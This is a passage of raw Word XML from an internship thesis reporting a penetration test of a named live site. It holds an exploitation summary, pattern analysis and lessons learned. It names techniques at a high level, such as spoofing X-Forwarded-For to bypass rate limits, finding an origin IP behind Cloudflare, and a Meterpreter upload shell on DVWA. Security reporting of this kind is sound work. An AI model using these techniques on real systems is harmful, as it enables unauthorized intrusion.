              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-001: Rate Limit Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**50/50 tokens — 0 rate limits**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>master_report.txt; Figure 4.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-002: JWT Token Farming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>50 valid tokens in 3 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite repeater + curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-003: Admin Panel Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM, cPanel, MikroTik all confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.10, 4.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-004: MySQL Public Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full TCP handshake from external IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap mysql-info script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DVWA File Upload: Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shell as www-data confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.20, 4.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 14: Exploitation summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.4 Pattern Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The vulnerabilities found in neuralsh.com reflect patterns documented broadly in the security literature for small technology companies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 1 — No Network Perimeter: Database and administrative services are exposed on the same public IP as web services with no network-level segregation. This single architectural failure is the root cause of 59% of all findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 2 — Application Security Without Infrastructure Security: The Cloudflare WAF, HSTS, and JWT signature validation represent real security investments at the application layer. The infrastructure running beneath the application — the server, the network equipment, the admin panels — has not received equivalent attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 3 — Shared Hosting Blast Radius: Shared hosting reduces cost but amplifies the impact of any single compromise across all co-tenants. The identification of onesala.com as a co-tenant means a breach of neuralsh.com's infrastructure creates third-party data protection liability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 4 — Rate Limiting Anti-Pattern: Using X-Forwarded-For for rate limiting when behind Cloudflare is a documented anti-pattern. Cloudflare provides CF-Connecting-IP specifically to prevent this bypass. The fix requires one line of code, but the vulnerability is widely exploitable until applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.5 Completed and Incomplete Tasks</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Perform vulnerability scanning on neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Analyze vulnerabilities and propose solutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Set up testing environment (VirtualBox + Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Perform penetration testing on authorized target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Demonstrate exploitation on misconfigured systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Analyze post-exploitation lateral movement risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Create official VAPT report for stakeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Demonstrate web app exploitation on alternative environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Stakeholder implementation of remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Incomplete — pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Follow-up verification of remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Incomplete — pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 15: Task completion status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.6 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship reinforced a set of principles that shaped the approach taken throughout:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance drives everything. The most impactful discovery of the entire engagement — the origin IP that bypassed the Cloudflare WAF — came from a simple DNS MX lookup. No specialized tool was required. The ability to systematically follow what an organization reveals about itself through public records is a more reliable skill than any automated scanner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>One misconfiguration leads to many. The WHM panel exposure, MySQL exposure, and MikroTik exposure are technically separate findings but share a single root cause: no firewall rules on the server. Fixing one with a firewall rule fixes all three simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence and documentation are as important as discovery. A vulnerability that cannot be clearly evidenced and communicated does not create change. Every finding in this engagement was documented with the specific command that confirmed it, the exact server response, and the precise remediation step required — because the goal is not to demonstrate skill but to help the organization improve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.7 Academic Contribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis contributes a complete real-world case study of a black-box VAPT engagement from reconnaissance through remediation on a live production target. The documentation of a successful rate-limiting bypass achieving a 100% bypass rate via single HTTP header modification provides empirically measured evidence of the practical impact of this vulnerability class — moving beyond theoretical descriptions to confirmed exploitation results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The finding that well-implemented application security controls (Cloudflare WAF, HSTS, JWT signature validation) can coexist with severely misconfigured infrastructure supports the argument that holistic security assessment — covering infrastructure, network, and application layers together — is essential for meaningful risk reduction. Surface-level protection at the CDN layer does not substitute for securing the origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
